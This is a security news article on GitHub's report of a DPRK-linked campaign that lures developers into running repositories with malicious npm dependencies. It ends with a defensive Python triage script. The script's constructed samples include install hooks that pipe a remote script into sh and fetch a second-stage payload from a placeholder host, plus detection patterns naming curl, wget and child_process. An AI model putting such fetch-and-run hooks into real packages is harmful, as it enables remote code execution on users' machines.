GitHub identified an attack on individual employees of IT companies

Tomcat

GitHub has identified a low-volume social engineering campaign targeting the personal accounts of employees of technology firms. According to the platform, no GitHub or npm systems were compromised in the course of the campaign.

The attackers use a combination of repository invitations and malicious npm package dependencies. Many of the targeted accounts are connected to the blockchain, cryptocurrency or online gambling sectors, and some may belong to employees in the cybersecurity sector.

GitHub attributes the campaign to the group tracked as Jade Sleet (also known as TraderTraitor), which is associated with the DPRK. The attackers pose as developers or recruiters, creating one or more fake accounts on GitHub and on other platforms including LinkedIn, Slack and Telegram; in some cases they use stolen legitimate accounts. They may initiate contact on one platform and then try to move the conversation to another.

After making contact, the attacker invites the developer to collaborate on a GitHub repository and persuades them to clone and run its contents. The repository, which can be public or private, contains software with malicious npm dependencies; the software is typically themed as a media player or a cryptocurrency trading tool.

The malicious npm packages download and execute second-stage payloads on the victim's machine. GitHub has published the list of domains used to serve the second stage.

The attacker often publishes the malicious packages only at the moment the fraudulent repository invitation is sent, minimizing the time the new package is exposed to scrutiny. In some cases the malware is delivered directly through a messaging or file-sharing platform, skipping the repository invitation step altogether.

The first-stage malware is analyzed in detail in a post on the Phylum Security blog.

GitHub has suspended the accounts associated with the campaign and published a list of them, and has filed abuse reports with the hosting providers of the domains involved.

Users are advised to review their security log for action:repo.add_member events to determine whether they accepted a repository invitation from one of the attacker accounts, and to review their dependencies and installation scripts: newly published packages, scripts or dependencies that establish network connections during installation warrant additional scrutiny. Anyone who may have been targeted is encouraged to contact their employer's security team. If malicious content was executed, the potentially affected devices should be reset or wiped, account passwords changed, and any credentials or tokens stored on the affected device rotated.

Meanwhile, Aqua Security's Nautilus research team analyzed a sample of 1.25 million GitHub repositories and found that about 2.95% of them were vulnerable to RepoJacking, in which an attacker registers an abandoned or renamed GitHub username to hijack the repository references that still point at it. This allows supply chain attacks that affect large numbers of users.
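The two checks recommended above (reviewing the security log for action:repo.add_member events, and reviewing dependencies for install scripts that reach out to the network), as an added example in Python that is not part of the original post or of GitHub's tooling. The audit-log events and the package.json documents below are constructed samples; the trusted-actor set, the cut-off date and the indicator patterns are assumptions chosen for illustration, not a list GitHub or Phylum published:

```python
"""Triage helpers for the two checks GitHub recommends (added example, not GitHub's code).

Assumptions (not from the original post):
  * Audit-log events are dicts shaped like an exported GitHub audit log entry
    ("action", "actor", "repo", "created_at"); SAMPLE_EVENTS below is constructed.
  * package.json contents are passed as strings; the samples below are constructed.
  * The indicator patterns are an illustrative set, not an authoritative IOC list.
"""
import json
import re
from datetime import datetime, timezone

# npm lifecycle hooks that run code during `npm install`.
NPM_LIFECYCLE_HOOKS = ("preinstall", "install", "postinstall", "prepare")

# Indicators that an install hook fetches or runs something from the network.
NETWORK_PATTERNS = [
    re.compile(r"\b(curl|wget)\b"),
    re.compile(r"https?://", re.IGNORECASE),
    re.compile(r"\bnode\s+-e\b"),
    re.compile(r"\b(fetch|http\.get|https\.get|net\.connect)\s*\("),
    re.compile(r"\b(child_process|exec|spawn)\b"),
]

# Assumed review parameters: collaborators you expect to have invited you, and
# the earliest date worth reviewing (both hypothetical).
TRUSTED_ACTORS = {"coworker-alice"}
SINCE = datetime(2023, 6, 1, tzinfo=timezone.utc)

# Constructed audit-log sample: one expected invite, one from an unknown account,
# one unrelated action, and one invite that predates the review window.
SAMPLE_EVENTS = [
    {"action": "repo.add_member", "actor": "coworker-alice",
     "repo": "acme/internal-tool", "created_at": "2023-06-20T10:00:00Z"},
    {"action": "repo.add_member", "actor": "unknown-recruiter-dev",
     "repo": "unknown-recruiter-dev/media-player", "created_at": "2023-07-01T09:30:00Z"},
    {"action": "repo.create", "actor": "me",
     "repo": "me/scratch", "created_at": "2023-07-02T08:00:00Z"},
    {"action": "repo.add_member", "actor": "old-contact",
     "repo": "old-contact/demo", "created_at": "2022-01-01T00:00:00Z"},
]

# Constructed package.json samples (names and URLs are placeholders).
BENIGN_PACKAGE_JSON = json.dumps({
    "name": "tiny-util", "version": "1.0.0",
    "scripts": {"test": "node test.js", "prepare": "npm run build"},
})
SUSPICIOUS_PACKAGE_JSON = json.dumps({
    "name": "media-player-helper", "version": "0.0.3",
    "scripts": {
        "prepare": "npm run build",
        "postinstall": "node -e \"require('https').get('https://example.invalid/stage2.js',"
                       " r => r.pipe(process.stdout))\"",
    },
})
CURL_PACKAGE_JSON = json.dumps({
    "name": "trading-bot-setup", "version": "2.1.0",
    "scripts": {"preinstall": "curl -fsSL https://example.invalid/setup.sh | sh"},
})


def suspicious_repo_invites(events, trusted_actors, since):
    """Return repo.add_member events from actors outside `trusted_actors`, on or after `since`."""
    hits = []
    for ev in events:
        if ev.get("action") != "repo.add_member":
            continue
        created = datetime.fromisoformat(ev["created_at"].replace("Z", "+00:00"))
        if created < since or ev.get("actor") in trusted_actors:
            continue
        hits.append(ev)
    return hits


def flag_install_scripts(package_json_text):
    """Return (hook, script, indicator) triples for lifecycle hooks that look network-active.

    Only the first matching indicator per hook is reported; a package with no
    lifecycle hooks, or only local build commands, yields an empty list.
    """
    pkg = json.loads(package_json_text)
    scripts = pkg.get("scripts") or {}
    findings = []
    for hook in NPM_LIFECYCLE_HOOKS:
        script = scripts.get(hook)
        if not script:
            continue
        for pat in NETWORK_PATTERNS:
            m = pat.search(script)
            if m:
                findings.append((hook, script, m.group(0)))
                break
    return findings


if __name__ == "__main__":
    for ev in suspicious_repo_invites(SAMPLE_EVENTS, TRUSTED_ACTORS, SINCE):
        print(f"review invite: {ev['repo']} from {ev['actor']} at {ev['created_at']}")
    for label, doc in (("benign", BENIGN_PACKAGE_JSON),
                       ("suspicious", SUSPICIOUS_PACKAGE_JSON),
                       ("curl", CURL_PACKAGE_JSON)):
        for hook, script, indicator in flag_install_scripts(doc):
            print(f"{label}: {hook} hook matched '{indicator}': {script}")
```

In practice the events would come from an export of the account or organization audit log, and the package.json documents from each directory under node_modules (or from the tarballs before installation, e.g. with npm's ignore-scripts option set while inspecting). A hit from either helper is a prompt for manual review, not proof of compromise: plenty of legitimate packages download prebuilt binaries in a postinstall hook, which is exactly why the advisory singles out newly published packages for extra scrutiny.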